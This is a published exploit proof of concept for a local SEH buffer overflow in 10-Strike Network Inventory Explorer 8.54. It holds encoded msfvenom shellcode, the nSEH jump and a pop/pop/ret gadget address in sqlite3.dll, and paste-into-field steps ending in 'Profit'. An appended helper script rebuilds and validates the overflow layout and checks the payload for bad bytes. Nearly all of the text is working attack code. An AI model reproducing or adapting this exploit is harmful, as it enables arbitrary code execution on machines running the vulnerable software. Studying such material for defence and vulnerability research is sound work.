10-Strike Network Inventory Explorer 8.54 Buffer Overflow ≈ Packet Storm


# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the Python script "poc.py"; it creates a new file "poc.txt"
# 2.- Copy the content of the new file "poc.txt" to the clipboard
# 3.- Open the application
# 4.- Go to 'Main' or 'Computers'
# 5.- Click 'Add'
# 6.- Paste the clipboard into the 'Computer' field, under the title "Computer Card"
# 7.- Click "OK"
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
# Payload size: 448 bytes
# (Python 3 syntax: every component is kept as bytes and the file is written in
# binary mode, so the buffer reaches poc.txt byte for byte.)

buf = b""
buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
buf += b"\x31\x75\x65\x50\x41\x41"

# nSEH: packed little-endian this is EB 06 90 90 = jmp short +6 (over the
# 4-byte handler pointer that follows), nop, nop
nseh = struct.pack("<I", 0x909006EB)
# SEH handler: a pop/pop/ret gadget in sqlite3.dll, which ships without ASLR,
# rebasing or SafeSEH, so the address is stable and the handler is honoured
seh = struct.pack("<I", 0x61E8497A)  # 0x61e8497a : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll)

# 211 bytes of filler reach the nSEH record; the 20 'A' bytes (0x41 = inc ecx)
# after the handler are what the short jump lands on before the decoder stub;
# the trailing 0xff bytes keep the overflow going past the SEH record so an
# access violation is raised and the overwritten handler gets called.
buffer = b"A" * 211 + nseh + seh + b"A" * 20 + buf + b"\xff" * 200

# Binary mode: no newline translation or text encoding may touch the payload
with open("poc.txt", "wb") as f:
    f.write(buffer)
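The layout above only works if the two-byte short jump in nSEH lands exactly on the byte after the handler pointer and the shellcode sits where the jump expects it. The following helper, added here as an example and not part of the original PoC, builds the same filler | nSEH | SEH | padding | shellcode | tail buffer from the PoC's constants, decodes the `jmp short rel8` in nSEH to compute where execution resumes, and scans for bytes a text field or clipboard paste typically cannot carry. The eight-byte INT3 "shellcode" and the bad-character set (0x00, 0x0a, 0x0d) are assumptions made for the example; the PoC does not list bad characters, and the real payload is the alpha_mixed blob above.

```python
import struct

# Layout constants taken from the PoC. POP_POP_RET is the sqlite3.dll gadget
# the PoC uses; NSEH_JMP packs little-endian to EB 06 90 90.
OFFSET_TO_NSEH = 211       # filler bytes before the nSEH record
POST_SEH_PADDING = 20      # filler between the handler pointer and the shellcode
TAIL_LEN = 200             # trailing 0xff bytes that keep the overflow going
POP_POP_RET = 0x61E8497A   # pop esi # pop edi # ret (sqlite3.dll, no ASLR/SafeSEH)
NSEH_JMP = 0x909006EB      # jmp short +6 ; nop ; nop

# Constructed placeholder shellcode (INT3 breakpoints), not the PoC payload.
PLACEHOLDER_SHELLCODE = b"\xcc" * 8


def short_jump_target(buf: bytes, at: int) -> int:
    """Offset that a 2-byte `jmp short rel8` located at `at` lands on.

    The CPU adds the signed 8-bit displacement to the address of the
    instruction that follows the jump (at + 2), so +6 from the first nSEH
    byte skips the remaining 2 nSEH bytes and the 4-byte handler pointer.
    """
    if buf[at] != 0xEB:
        raise ValueError("no jmp short at offset %d" % at)
    rel8 = struct.unpack("<b", buf[at + 1:at + 2])[0]
    return at + 2 + rel8


def build_seh_buffer(shellcode: bytes, offset: int = OFFSET_TO_NSEH,
                     padding: int = POST_SEH_PADDING, tail: int = TAIL_LEN) -> bytes:
    """Assemble filler | nSEH | SEH | padding | shellcode | tail as the PoC does."""
    return (b"A" * offset
            + struct.pack("<I", NSEH_JMP)
            + struct.pack("<I", POP_POP_RET)
            + b"A" * padding          # 0x41 = inc ecx, harmless slide into the decoder
            + shellcode
            + b"\xff" * tail)         # overrun past the SEH record to raise the exception


def check_layout(buf: bytes, shellcode: bytes, offset: int = OFFSET_TO_NSEH) -> dict:
    """Trace the path: exception -> overwritten handler (pop pop ret) -> nSEH -> shellcode.

    pop/pop/ret returns into the nSEH field, whose jmp must land on the first
    byte after the handler pointer; the shellcode must then follow the padding.
    """
    nseh_at = offset
    seh_at = offset + 4
    landing = short_jump_target(buf, nseh_at)
    sc_at = buf.find(shellcode)
    return {
        "handler": struct.unpack("<I", buf[seh_at:seh_at + 4])[0],
        "jmp_lands_at": landing,
        "lands_after_handler": landing == seh_at + 4,
        "shellcode_at": sc_at,
        "gap_to_shellcode": sc_at - landing,
    }


def find_bad_bytes(buf: bytes, bad=(0x00, 0x0A, 0x0D)) -> list:
    """Offsets of bytes likely to be truncated or altered by a text field or a
    clipboard paste. The set is an assumption for a typical text input; the
    PoC itself lists no bad characters."""
    return [i for i, b in enumerate(buf) if b in bad]


if __name__ == "__main__":
    poc = build_seh_buffer(PLACEHOLDER_SHELLCODE)
    print(check_layout(poc, PLACEHOLDER_SHELLCODE))
    print("bad bytes at:", find_bad_bytes(poc))
```

Swap `PLACEHOLDER_SHELLCODE` for the real `buf` to check the actual payload: the layout checks stay valid because they depend only on the 211/4/4/20 geometry, and `find_bad_bytes` then tells you whether the decoder stub or encoded body contains a byte the target's input path will not accept.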


